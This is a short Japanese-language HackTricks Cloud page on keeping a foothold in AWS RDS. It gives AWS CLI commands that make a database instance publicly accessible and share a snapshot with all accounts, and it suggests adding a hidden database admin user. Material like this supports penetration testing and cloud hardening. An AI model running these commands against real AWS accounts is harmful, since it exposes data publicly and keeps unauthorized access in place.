AWS - RDS Persistence

ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)

HackTricks をサポートする他の方法:

RDS

詳細については、以下をチェックしてください:

pageAWS - Relational Database (RDS) Enum

インスタンスを公開可能にする: rds:ModifyDBInstance

この権限を持つ攻撃者は、既存のRDSインスタンスを変更して公開アクセスを有効にすることができます。

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

DB内に管理者ユーザーを作成する

攻撃者は単純にDB内にユーザーを作成することができるため、マスターユーザーのパスワードが変更されても、データベースへのアクセスを失わない

スナップショットを公開する

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
htARTE(HackTricks AWS Red Team Expert) を通じて、ゼロからヒーローまでAWSハッキングを学ぶ

HackTricksをサポートする他の方法:

  • HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!

  • The PEASS Familyを発見し、独占的なNFTsコレクションを見つける

  • 💬 Discordグループまたはtelegramグループ参加するか、Twitter 🐦 @hacktricks_liveフォローする

  • HackTricks(https://github.com/carlospolop/hacktricks)およびHackTricks Cloud(https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。

最終更新